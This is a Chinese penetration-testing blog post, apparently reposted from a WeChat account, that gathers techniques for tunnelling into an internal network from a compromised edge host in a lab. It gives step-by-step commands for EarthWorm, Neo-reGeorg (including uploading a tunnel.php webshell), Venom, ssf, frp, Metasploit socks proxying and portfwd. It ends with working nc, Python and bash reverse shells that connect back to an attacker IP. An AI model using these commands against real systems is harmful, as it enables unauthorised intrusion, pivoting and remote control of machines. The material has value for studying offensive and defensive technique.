内网穿透姿势汇总

  • A+
所属分类:安全文章

内网穿透姿势汇总

0x00 前言

在渗透中拿到一台边缘机器后剩余内网机器不出网的情况很常见,这时我们就需要把内网机器流量转到边缘机器上再进行访问,内网流量转出来的方法很多,在下面就介绍几种常见的方法


0x01 环境介绍

本地环境搭建:

边缘机器:

windows 7ip:192.168.10.15(外) 192.168.52.143(内)目标机器:windows 2008R2ip:192.168.52.138攻击机器:windows 2008ip:192.168.10.3kali:msf5:192.168.10.14msf6:192.168.10.11


0x02 EarthWorm

将ew_for_windows上传到边缘机器


1.正向连接

适用于目标机器拥有一个外网ip

在win7机器上执行

ew -s ssocksd -l 888


监听本机888端口。然后在2008r2机器上使用proxifier进行连接

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

2.反向连接

适用于边缘机器无公网ip

攻击机器上执行

ew_for_Win.exe -s rcsocks -l 1080 -e 1234

内网穿透姿势汇总

对外1234端口转发到1080端口

然后边缘机器连接

ew_for_Win.exe -s rssocks -d 192.168.10.3 -e 1234

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总


0x03 Neo-reGeorg

注:这里需要python环境,在2008R2上弄总是出错,切到物理机进行实验,原理相同

生成文件

python neoreg.py generate -k 123456

内网穿透姿势汇总

在neoreg_servers目录下生成了木马文件

内网穿透姿势汇总

这里web机器解析php,所以我上传一个tunnel.php的马到web机器(win7)上

内网穿透姿势汇总

攻击机连接

python neoreg.py -k 123456 -u http://192.168.10.15/tunnel.php
内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总


0x04 Venom

攻击机器上执行

admin.exe -lport 9999


内网穿透姿势汇总

边缘机器(win7)执行

agent.exe -rhost 192.168.10.3 -rport 9999

内网穿透姿势汇总

攻击机查看反弹成功

内网穿透姿势汇总

执行命令

goto 1socks 6666

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总


0x05 ssf

1.正向连接

把certs文件夹和ssfd上传到边缘机器

边缘机器开启1333端口

ssfd.exep 1333

内网穿透姿势汇总


攻击机连接边缘机器的1333端口,并将数据转发给1222端口

ssfd.exeD 1222 ‐p 1333 192.168.10.15

2008r2出问题,换到物理机上执行

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

2.反向连接

攻击机本地监听1234端口,命令如下:

ssfd.exep 1234

内网穿透姿势汇总

边缘机器连接1234端口,并将数据转发到12345端口,命令如下:

ssf.exeF 12345 ‐p 1234 192.168.10.3

此处没有实验成功,还是写下步骤

本地socks代理连接127.0.0.1 12345端口

内网穿透姿势汇总


0x06 frp

攻击机设置frps.ini

[common]bind_port = 6666

运行如下命令:

frps.exe -c frps.ini

内网穿透姿势汇总


在边缘机器设置frpc.ini

[common]server_addr = 192.168.10.3server_port = 6666[http_proxy]type=tcpremote_port=7777plugin=socks5

执行如下命令:

frpc.exe ‐c frpc.ini

内网穿透姿势汇总

监听本地7777端口

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总


0x07 msf

在msf6下只剩下了socks_proxy这个模块

内网穿透姿势汇总

还是先修改proxychains4.conf这个配置文件

内网穿透姿势汇总

添加路由使用模块

内网穿透姿势汇总

这里注意一下,我们在运行之前先show options一下,发现默认是socks5

内网穿透姿势汇总


代理运行如果想使用socks4a代理,添加如下语句即可

set version 4a

内网穿透姿势汇总

修改浏览器配置

内网穿透姿势汇总

成功访问内网资源

内网穿透姿势汇总

拓展:portfwd端口转发

portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地,并且监听,使用方法如下

portfwd add -l 3389 -r 192.168.52.138 -p 3389

然后我们访问本地3389


0x08 nc

1.正向连接

需要目标有公网ip

目标机器

nc -lvp 4444 -e /bin/sh linuxnc -lvp 4444 -e c:windowssystem32cmd.exe windows

攻击机器

nc <目标机器ip> 4444

内网穿透姿势汇总

内网穿透姿势汇总

内网穿透姿势汇总

2.反向连接

攻击机器监听本地1234端口

nc -lvp 1234

内网穿透姿势汇总

目标机器执行

nc <ip> 1234 -e /bin/sh linuxnc <ip> 1234 -e cmd.exe windows

内网穿透姿势汇总

内网穿透姿势汇总

在一般情况下目标机器是没有nc的,这里可以用其他工具或者编程语言来代替nc

python反向shell


攻击机器:

nc -lvp 2222

目标机器:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.10.3',2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

bash反向shell

攻击机器:

nc -lvp 2222


目标机器:


bash -i >& /dev/tcp/192.168.10.3/2222 0>&1


往期精彩


登陆页面的检测及渗透

渗透实战篇(一)

渗透测试信息收集的方法

常见Web中间件漏洞利用及修复方法

内网渗透 | 流量转发场景测试

Waf从入门到Bypass

实战渗透-看我如何拿下学校的大屏幕

技术篇:bulldog水平垂直越权+命令执行+提权

渗透工具实战技巧大合集 | 先收藏点赞再转发一气呵成


内网穿透姿势汇总

感兴趣的可以点个关注!!!

内网穿透姿势汇总

关注「安全先师」
把握前沿安全脉搏



本文始发于微信公众号(安全先师):内网穿透姿势汇总

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: